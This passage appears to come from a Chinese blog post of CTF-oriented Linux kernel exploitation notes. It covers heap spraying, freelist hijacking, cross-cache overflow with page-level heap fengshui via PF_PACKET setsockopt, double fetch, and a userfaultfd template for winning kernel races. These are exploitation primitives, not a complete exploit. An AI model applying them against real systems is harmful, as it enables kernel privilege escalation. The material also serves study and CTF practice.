<p>而 <code>ldt_struct</code> 、<code>packet_socket</code> 等与用户空间数据没有直接关联的结构体则使用 <code>GFP_KERNEL</code></p>
<p>在 <code>5.9</code> 版本之前<code>GFP_KERNEL</code> 与 <code>GFP_KERNEL_ACCOUNT</code> 存在隔离机制，后来取消了隔离机制，自内核版本 <code>5.14</code> 起又重新引入：</p>
<ul>
<li>对于开启了 <code>CONFIG_MEMCG_KMEM</code> 编译选项的 <code>kernel</code> 而言（默认开启），会为使用 <code>GFP_KERNEL_ACCOUNT</code> 进行分配的通用对象创建一组独立的 <code>kmem_cache</code> ,名为 <code>kmalloc-cg-*</code> ，从而导致使用这两种 <code>flag</code> 的 <code>object</code> 之间的隔离</li>
</ul>
<h5 id="slub-合并-amp-隔离"><a href="#slub-合并-amp-隔离" class="headerlink" title="slub 合并 &amp; 隔离"></a>slub 合并 &amp; 隔离</h5><p><code>slab alias</code>机制是一种对同等或相近大小<code>object</code>的 <code>kmem_cache</code> 进行复用的机制</p>
<p>当一个 <code>kmem_cache</code> 在创建时，若已经存在能分配相等或近似大小的 <code>object</code>的 <code>kmem_cache</code> ，则不会创建新的<code>kmem_cache</code>，而是为原有的<code>kmem_cache</code>起一个<code>alias</code>，作为新的<code>kmem_cache</code>返回</p>
<p>对于初始化时设置了 <code>SLAB_ACCOUNT</code> 的 <code>kmem_cache</code> 会新建一个新的 <code>kmem_cache</code> 而非为原有的建立 <code>alias</code>,如在新版的内核当中 <code>cred_jar</code> 与 <code>kmalloc-192</code> 便是两个独立的 <code>kmem_cache</code>，<strong>彼此之间互不干扰</strong></p>
<h4 id="Heap-Spray"><a href="#Heap-Spray" class="headerlink" title="Heap Spray"></a>Heap Spray</h4><p><strong>堆喷射</strong>（<code>heap spraying</code>）：通过大量分配相同的结构体来达成某种特定的内存布局，应用场景：</p>
<ul>
<li><code>UAF</code>，无法通过少量内存分配拿到该结构体，例如该 <code>object</code> 不属于当前<code>freelist</code>且释放后会回到<code>node</code>上，或是像 <code>add_key()</code> 会被一直卡在第一个临时结构体上，可以通过堆喷射来确保拿到该<code>object</code></li>
<li>堆溢出读&#x2F;写，但是堆布局不可知，比如开启了 <code>SLAB_FREELIST_RANDOM</code>（默认开启），可以预先喷射大量特定结构体，从而保证对其中某个结构体的溢出</li>
</ul>
<h4 id="freelist劫持"><a href="#freelist劫持" class="headerlink" title="freelist劫持"></a>freelist劫持</h4><p>与用户态 <code>glibc</code> 中分配 <code>fake chunk</code> 后覆写 <code>__free_hook</code> 这样的手法类似，我们同样可以通过覆写 <code>freelist</code> 中的 <code>next</code> 指针的方式完成内核空间中任意地址上的对象分配，并修改内核当中一些有用的数据以完成提权，例如一些函数表等</p>
<h3 id="Buddy-System"><a href="#Buddy-System" class="headerlink" title="Buddy System"></a>Buddy System</h3><h4 id="Cross-Cache-Overflow-amp-Page-level-Heap-Fengshui"><a href="#Cross-Cache-Overflow-amp-Page-level-Heap-Fengshui" class="headerlink" title="Cross-Cache Overflow &amp; Page-level Heap Fengshui"></a>Cross-Cache Overflow &amp; Page-level Heap Fengshui</h4><h5 id="Cross-Cache-Overflow"><a href="#Cross-Cache-Overflow" class="headerlink" title="Cross-Cache Overflow"></a>Cross-Cache Overflow</h5><p>针对<code>buddy system</code>的利用手法，内存中用作不同<code>kmem_cache</code>的页面内存上可能相邻，若漏洞对象页面与溢出目标对象页面相邻，则可能实现跨越不同<code>kmem_cache</code>之间的堆溢出，但是需要非常严苛的页级堆排布，此时就需要页级堆风水</p>
<h5 id="Page-level-Heap-Fengshui"><a href="#Page-level-Heap-Fengshui" class="headerlink" title="Page-level Heap Fengshui"></a>Page-level Heap Fengshui</h5><p>以内存页为粒度的内存排布方式，纯手工构造一个新的已知的页级粒度内存页排布</p>
<p><code>slub allocator</code> 向 <code>buddy system</code> 请求页面的过程，当 <code>freelist page</code> 已经耗空且 <code>partial</code> 链表也为空时（或者 <code>kmem_cache</code> 刚刚创建后进行第一次分配时），其会向 <code>buddy system</code> 申请页面：</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/slub-new-page.png" class>

<p><code>buddy system</code>其基本原理就是以 <code>2</code> 的 <code>order</code> 次幂张内存页作为分配粒度，相同 <code>order </code>间空闲页面构成双向链表，当低阶 <code>order </code>的页面不够用时便会从高阶 <code>order</code> 取一份连续内存页拆成两半，其中一半挂回当前请求 <code>order</code> 链表，另一半返还给上层调用者</p>
<p>从更高阶 <code>order</code> 拆分成的两份低阶 <code>order</code> 的连续内存页<strong>是物理连续的</strong>，由此我们可以：</p>
<ul>
<li>向 <code>buddy system</code> 请求两份连续的内存页</li>
<li>释放其中一份内存页，在 <code>vulnerable kmem_cache</code> 上堆喷，让其取走这份内存页</li>
<li>释放另一份内存页，在 <code>victim kmem_cache</code> 上堆喷，让其取走这份内存页</li>
</ul>
<p>此时我们便有可能溢出到其他的内核结构体上，从而完成 <code>cross-cache overflow</code></p>
<p>利用：<code>setsockopt</code> 与 <code>pgv </code>完成页级内存占位与堆风水</p>
<p>创建一个 <code>protocol</code> 为 <code>PF_PACKET</code> 的 <code>socket</code> 之后，先调用 <code>setsockopt()</code> 将 <code>PACKET_VERSION</code> 设为 <code>TPACKET_V1</code>&#x2F; <code>TPACKET_V2</code>，再调用 <code>setsockopt()</code> 提交一个 <code>PACKET_TX_RING</code> ，此时便存在如下调用链：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token function">__sys_setsockopt</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    sock<span class="token operator">-></span>ops<span class="token operator">-></span><span class="token function">setsockopt</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token function">packet_setsockopt</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token comment">// case PACKET_TX_RING ↓</span>
            <span class="token function">packet_set_ring</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
                <span class="token function">alloc_pg_vec</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在 <code>alloc_pg_vec()</code> 中会创建一个 <code>pgv</code> 结构体，用以分配 <code>tp_block_nr</code> 份 <code>2^order</code> 张内存页，其中 <code>order</code> 由 <code>tp_block_size</code> 决定：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">static</span> <span class="token keyword">struct</span> <span class="token class-name">pgv</span> <span class="token operator">*</span><span class="token function">alloc_pg_vec</span><span class="token punctuation">(</span><span class="token keyword">struct</span> <span class="token class-name">tpacket_req</span> <span class="token operator">*</span>req<span class="token punctuation">,</span> <span class="token keyword">int</span> order<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">int</span> block_nr <span class="token operator">=</span> req<span class="token operator">-></span>tp_block_nr<span class="token punctuation">;</span>
    <span class="token keyword">struct</span> <span class="token class-name">pgv</span> <span class="token operator">*</span>pg_vec<span class="token punctuation">;</span>
    <span class="token keyword">int</span> i<span class="token punctuation">;</span>

    pg_vec <span class="token operator">=</span> <span class="token function">kcalloc</span><span class="token punctuation">(</span>block_nr<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">struct</span> <span class="token class-name">pgv</span><span class="token punctuation">)</span><span class="token punctuation">,</span> GFP_KERNEL <span class="token operator">|</span> __GFP_NOWARN<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">unlikely</span><span class="token punctuation">(</span><span class="token operator">!</span>pg_vec<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">goto</span> out<span class="token punctuation">;</span>

    <span class="token keyword">for</span> <span class="token punctuation">(</span>i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> block_nr<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        pg_vec<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">.</span>buffer <span class="token operator">=</span> <span class="token function">alloc_one_pg_vec_page</span><span class="token punctuation">(</span>order<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">unlikely</span><span class="token punctuation">(</span><span class="token operator">!</span>pg_vec<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">.</span>buffer<span class="token punctuation">)</span><span class="token punctuation">)</span>
            <span class="token keyword">goto</span> out_free_pgvec<span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

out<span class="token operator">:</span>
    <span class="token keyword">return</span> pg_vec<span class="token punctuation">;</span>

out_free_pgvec<span class="token operator">:</span>
    <span class="token function">free_pg_vec</span><span class="token punctuation">(</span>pg_vec<span class="token punctuation">,</span> order<span class="token punctuation">,</span> block_nr<span class="token punctuation">)</span><span class="token punctuation">;</span>
    pg_vec <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">;</span>
    <span class="token keyword">goto</span> out<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在 <code>alloc_one_pg_vec_page()</code> 中会直接调用 <code>__get_free_pages()</code> 向 <code>buddy system</code> 请求内存页，因此我们可以利用该函数进行大量的页面请求：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">static</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token function">alloc_one_pg_vec_page</span><span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">long</span> order<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">char</span> <span class="token operator">*</span>buffer<span class="token punctuation">;</span>
    <span class="token class-name">gfp_t</span> gfp_flags <span class="token operator">=</span> GFP_KERNEL <span class="token operator">|</span> __GFP_COMP <span class="token operator">|</span>
              __GFP_ZERO <span class="token operator">|</span> __GFP_NOWARN <span class="token operator">|</span> __GFP_NORETRY<span class="token punctuation">;</span>

    buffer <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span><span class="token punctuation">)</span> <span class="token function">__get_free_pages</span><span class="token punctuation">(</span>gfp_flags<span class="token punctuation">,</span> order<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>buffer<span class="token punctuation">)</span>
        <span class="token keyword">return</span> buffer<span class="token punctuation">;</span>
    <span class="token comment">//...</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>相应地， <code>pgv</code> 中的页面也会在 <code>socket</code> 被关闭后释放：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token function">packet_release</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token function">packet_set_ring</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token function">free_pg_vec</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><code>setsockopt()</code> 也可以帮助我们完成<strong>页级堆风水</strong>，当我们耗尽 <code>buddy system</code> 中的 <code>low order pages</code> 后，我们再请求的页面便都是物理连续的，因此此时我们再进行 <code>setsockopt()</code> 便<strong>相当于获取到了一块近乎物理连续的内存</strong>（大量的 <code>setsockopt()</code> 流程中同样会分配大量我们不需要的结构体，从而消耗 <code>buddy system</code> 的部分页面）</p>
<h4 id="Page-level-UAF"><a href="#Page-level-UAF" class="headerlink" title="Page-level UAF"></a>Page-level UAF</h4><p>对内存页结构体 <code>page</code> 的释放后利用，例如可以通过内存页重分配的方式将 <code>UAF page</code>分配为指定 <code>kmem_cache</code> 的 <code>slub pages</code> ，从而实现无需任何限制的跨 <code>kmem_cache</code> 的 <code>UAF</code> 利用</p>
<h2 id="Race-Condition"><a href="#Race-Condition" class="headerlink" title="Race Condition"></a>Race Condition</h2><h3 id="Double-Fetch"><a href="#Double-Fetch" class="headerlink" title="Double Fetch"></a>Double Fetch</h3><p>原理上属于条件竞争漏洞，是一种内核态与用户态之间的数据访问竞争</p>
<p>用户空间向内核传递数据时，内核通过 <code>copy_from_user</code> 等拷贝函数将用户数据拷贝至内核空间，数据复杂时只引用指针</p>
<p>第一次<code>fetch</code>进行校验及相关处理，将数据暂时保存在用户空间，第二次<code>fetch</code>进行数据实际处理</p>
<p>在两次取用数据之间，另一个用户态线程可创造条件竞争，对已通过检查的用户态数据进行篡改，造成内核验证通过数据与实际使用数据不一致形成访问越界或缓冲区溢出</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/double-fetch.png" class>

<h3 id="userfaultfd的使用"><a href="#userfaultfd的使用" class="headerlink" title="userfaultfd的使用"></a>userfaultfd的使用</h3><p><code>userfaultfd</code>是一个<code>linux</code>系统调用，用户可以通过自定义的<code>page fault handler</code>在用户态处理缺页异常，流程如下图</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/userfaultfd.png" class>

<p>首先要注册一个<code>userfaultfd</code>，通过<code> ioctl</code> 监视一块内存区域，同时启动一个用以进行轮询的线程 <code>uffd monitor</code>，该线程会通过 <code>poll()</code> 函数不断轮询<strong>直到出现缺页异常</strong></p>
<ul>
<li>当有一个线程在这块内存区域内触发缺页异常时（比如说第一次访问一个匿名页），该线程（称之为 <code>faulting</code> 线程）进入到内核中处理缺页异常</li>
<li>内核会调用 <code>handle_userfault()</code> 交由 <code>userfaultfd </code>处理</li>
<li>随后 <code>faulting</code> 线程进入堵塞状态，同时将一个 <code>uffd_msg</code> 发送给 <code>monitor</code> 线程，等待其处理结束</li>
<li><code>monitor</code> 线程调用通过 <code>ioctl</code> 处理缺页异常，有如下选项：<ul>
<li><code>UFFDIO_COPY</code>：将用户自定义数据拷贝到 <code>faulting page</code> 上</li>
<li><code>UFFDIO_ZEROPAGE</code> ：将 <code>faulting page</code> 置 <code>0</code></li>
<li><code>UFFDIO_WAKE</code>：用于配合上面两项中 <code>UFFDIO_COPY_MODE_DONTWAKE</code> 和 <code>UFFDIO_ZEROPAGE_MODE_DONTWAKE</code> 模式实现批量填充</li>
</ul>
</li>
<li>在处理结束后 <code>monitor</code> 线程发送信号唤醒 <code>faulting</code> 线程继续工作</li>
</ul>
<p>该机制最初被设计来用以进行虚拟机 &#x2F; 进程的迁移等用途，但是<strong>通过这个机制可以控制进程执行流程的先后顺序，从而使得对条件竞争的利用成功率大幅提高</strong>，比如在如下的操作时：</p>
<pre class="line-numbers language-none"><code class="language-none">copy_from_user(kptr, user_buf, size);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果在进入函数后，实际拷贝开始前线程被中断换下 <code>CPU</code>，别的线程执行，修改了 <code>kptr</code> 指向的内存块的所有权（比如 <code>kfree</code> 掉了这个内存块），然后再执行拷贝时就可以实现 <code>UAF</code>。这种可能性当然是比较小的，但是如果 <code>user_buf</code> 是一个 <code>mmap</code> 的内存块，并且我们为它注册了 <code>userfaultfd</code>，那么在拷贝时出现缺页异常后此线程会先执行我们注册的处理函数，在处理函数结束前线程一直被暂停，结束后才会执行后面的操作，大大增加了竞争的成功率</p>
<p>使用方法：</p>
<p>在<code>Linux man page</code>当中已经提供了 <code>userfaultfd</code> 的基本使用模板，只需要稍加修改便能直接投入到实战当中，为特定内存注册 <code>userfaultfd monitor</code> 的模板：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">void</span> <span class="token function">err_exit</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>msg<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\033[31m\033[1m[x] Error at: \033[0m%s\n"</span><span class="token punctuation">,</span> msg<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">exit</span><span class="token punctuation">(</span>EXIT_FAILURE<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">void</span> <span class="token function">register_userfaultfd</span><span class="token punctuation">(</span><span class="token class-name">pthread_t</span> <span class="token operator">*</span>monitor_thread<span class="token punctuation">,</span> <span class="token keyword">void</span> <span class="token operator">*</span>addr<span class="token punctuation">,</span>
                          <span class="token keyword">unsigned</span> <span class="token keyword">long</span> len<span class="token punctuation">,</span> <span class="token keyword">void</span> <span class="token operator">*</span><span class="token punctuation">(</span><span class="token operator">*</span>handler<span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token operator">*</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">long</span> uffd<span class="token punctuation">;</span>
    <span class="token keyword">struct</span> <span class="token class-name">uffdio_api</span> uffdio_api<span class="token punctuation">;</span>
    <span class="token keyword">struct</span> <span class="token class-name">uffdio_register</span> uffdio_register<span class="token punctuation">;</span>
    <span class="token keyword">int</span> s<span class="token punctuation">;</span>

    <span class="token comment">/* Create and enable userfaultfd object */</span>
    uffd <span class="token operator">=</span> <span class="token function">syscall</span><span class="token punctuation">(</span>__NR_userfaultfd<span class="token punctuation">,</span> O_CLOEXEC <span class="token operator">|</span> O_NONBLOCK<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>uffd <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
        <span class="token function">err_exit</span><span class="token punctuation">(</span><span class="token string">"userfaultfd"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    uffdio_api<span class="token punctuation">.</span>api <span class="token operator">=</span> UFFD_API<span class="token punctuation">;</span>
    uffdio_api<span class="token punctuation">.</span>features <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">ioctl</span><span class="token punctuation">(</span>uffd<span class="token punctuation">,</span> UFFDIO_API<span class="token punctuation">,</span> <span class="token operator">&amp;</span>uffdio_api<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
        <span class="token function">err_exit</span><span class="token punctuation">(</span><span class="token string">"ioctl-UFFDIO_API"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    uffdio_register<span class="token punctuation">.</span>range<span class="token punctuation">.</span>start <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">long</span><span class="token punctuation">)</span> addr<span class="token punctuation">;</span>
    uffdio_register<span class="token punctuation">.</span>range<span class="token punctuation">.</span>len <span class="token operator">=</span> len<span class="token punctuation">;</span>
    uffdio_register<span class="token punctuation">.</span>mode <span class="token operator">=</span> UFFDIO_REGISTER_MODE_MISSING<span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">ioctl</span><span class="token punctuation">(</span>uffd<span class="token punctuation">,</span> UFFDIO_REGISTER<span class="token punctuation">,</span> <span class="token operator">&amp;</span>uffdio_register<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
        <span class="token function">err_exit</span><span class="token punctuation">(</span><span class="token string">"ioctl-UFFDIO_REGISTER"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    s <span class="token operator">=</span> <span class="token function">pthread_create</span><span class="token punctuation">(</span>monitor_thread<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> handler<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">void</span> <span class="token operator">*</span><span class="token punctuation">)</span> uffd<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>s <span class="token operator">!=</span> <span class="token number">0</span><span class="token punctuation">)</span>
        <span class="token function">err_exit</span><span class="token punctuation">(</span><span class="token string">"pthread_create"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以直接通过如下操作来为一块匿名的 <code>mmap</code> 内存注册 <code>userfaultfd</code>：</p>
<pre class="line-numbers language-none"><code class="language-none">register_userfaultfd(thread, addr, len, handler);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>需要注意的是 <code>handler</code> 的写法：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">static</span> <span class="token keyword">char</span> <span class="token operator">*</span>uffd_src_page <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">;</span> <span class="token comment">// 你要拷贝进去的数据</span>
<span class="token keyword">static</span> <span class="token keyword">long</span> uffd_src_page_size <span class="token operator">=</span> <span class="token number">0x1000</span><span class="token punctuation">;</span>

<span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token operator">*</span>
<span class="token function">fault_handler_thread</span><span class="token punctuation">(</span><span class="token keyword">void</span> <span class="token operator">*</span>arg<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">static</span> <span class="token keyword">struct</span> <span class="token class-name">uffd_msg</span> msg<span class="token punctuation">;</span>
    <span class="token keyword">static</span> <span class="token keyword">int</span> fault_cnt <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token keyword">long</span> uffd<span class="token punctuation">;</span>

    <span class="token keyword">struct</span> <span class="token class-name">uffdio_copy</span> uffdio_copy<span class="token punctuation">;</span>
    <span class="token class-name">ssize_t</span> nread<span class="token punctuation">;</span>

    uffd <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">long</span><span class="token punctuation">)</span> arg<span class="token punctuation">;</span>

    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span><span class="token punctuation">;</span><span class="token punctuation">)</span> 
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">struct</span> <span class="token class-name">pollfd</span> pollfd<span class="token punctuation">;</span>
        <span class="token keyword">int</span> nready<span class="token punctuation">;</span>
        pollfd<span class="token punctuation">.</span>fd <span class="token operator">=</span> uffd<span class="token punctuation">;</span>
        pollfd<span class="token punctuation">.</span>events <span class="token operator">=</span> POLLIN<span class="token punctuation">;</span>
        nready <span class="token operator">=</span> <span class="token function">poll</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>pollfd<span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token comment">/*
         * [在这停顿.jpg]
         * 当 poll 返回时说明出现了缺页异常
         * 你可以在这里插入一些比如说 sleep() 一类的操作，
         * 例如等待其他进程完成对象的重分配后再重新进行拷贝一类的，也可以直接睡死 ：）
         */</span>

        <span class="token keyword">if</span> <span class="token punctuation">(</span>nready <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
            <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"poll"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        nread <span class="token operator">=</span> <span class="token function">read</span><span class="token punctuation">(</span>uffd<span class="token punctuation">,</span> <span class="token operator">&amp;</span>msg<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>msg<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token keyword">if</span> <span class="token punctuation">(</span>nread <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span>
            <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"EOF on userfaultfd!\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token keyword">if</span> <span class="token punctuation">(</span>nread <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
            <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"read"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token keyword">if</span> <span class="token punctuation">(</span>msg<span class="token punctuation">.</span>event <span class="token operator">!=</span> UFFD_EVENT_PAGEFAULT<span class="token punctuation">)</span>
            <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"Unexpected event on userfaultfd\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        uffdio_copy<span class="token punctuation">.</span>src <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">long</span><span class="token punctuation">)</span> uffd_src_page<span class="token punctuation">;</span>
        uffdio_copy<span class="token punctuation">.</span>dst <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">long</span><span class="token punctuation">)</span> msg<span class="token punctuation">.</span>arg<span class="token punctuation">.</span>pagefault<span class="token punctuation">.</span>address <span class="token operator">&amp;</span>
                                              <span class="token operator">~</span><span class="token punctuation">(</span>uffd_src_page_size <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        uffdio_copy<span class="token punctuation">.</span>len <span class="token operator">=</span> page_size<span class="token punctuation">;</span>
        uffdio_copy<span class="token punctuation">.</span>mode <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
        uffdio_copy<span class="token punctuation">.</span>copy <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">ioctl</span><span class="token punctuation">(</span>uffd<span class="token punctuation">,</span> UFFDIO_COPY<span class="token punctuation">,</span> <span class="token operator">&amp;</span>uffdio_copy<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
            <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"ioctl-UFFDIO_COPY"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="Tricks"><a href="#Tricks" class="headerlink" title="Tricks"></a>Tricks</h2><h3 id="内存中直接搜索flag"><a href="#内存中直接搜索flag" class="headerlink" title="内存中直接搜索flag"></a>内存中直接搜索flag</h3><p><code>Initial RAM disk</code>（<code>initrd</code>）提供了在 <code>boot loader</code> 阶段载入一个 <code>RAM disk</code> 并挂载为根文件系统的能力，从而在该阶段运行一些用户态程序，在完成该阶段工作之后才是挂载真正的根文件系统</p>
<p><code>initrd</code>文件系统镜像通常为<code>gzip</code>格式，在启动阶段由<code>boot loader</code>将其路径传给<code>kernel</code>，自<code>2.6</code>版本后出现了使用<code>cpio</code>格式的<code>initramfs</code>，从而无需挂载便能展开为一个文件系统</p>
<p><code>initrd/initramfs</code>的特点是文件系统中的所有内容都会被读取到内存当中，而大部分 <code>CTF</code> 中的 <code>kernel pwn</code> 题目都选择直接将 <code>initrd</code> 作为根文件系统，因此若是我们有内存搜索能力就能直接在内存空间中搜索<code>flag</code>的内容</p>

                
            </div>
            <hr/>

            



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/kernel/">
                                    <span class="chip bg-color">kernel</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2024/03/23/xctf-ggbond-fu-xian/xctf-ggbond-fu-xian/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="xctf-ggbond复现">
                        
                        <span class="card-title">xctf-ggbond复现</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            xctf ggbond-面向wp复现（bushi
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2024-03-23
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WP/" class="post-category">
                                    WP
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
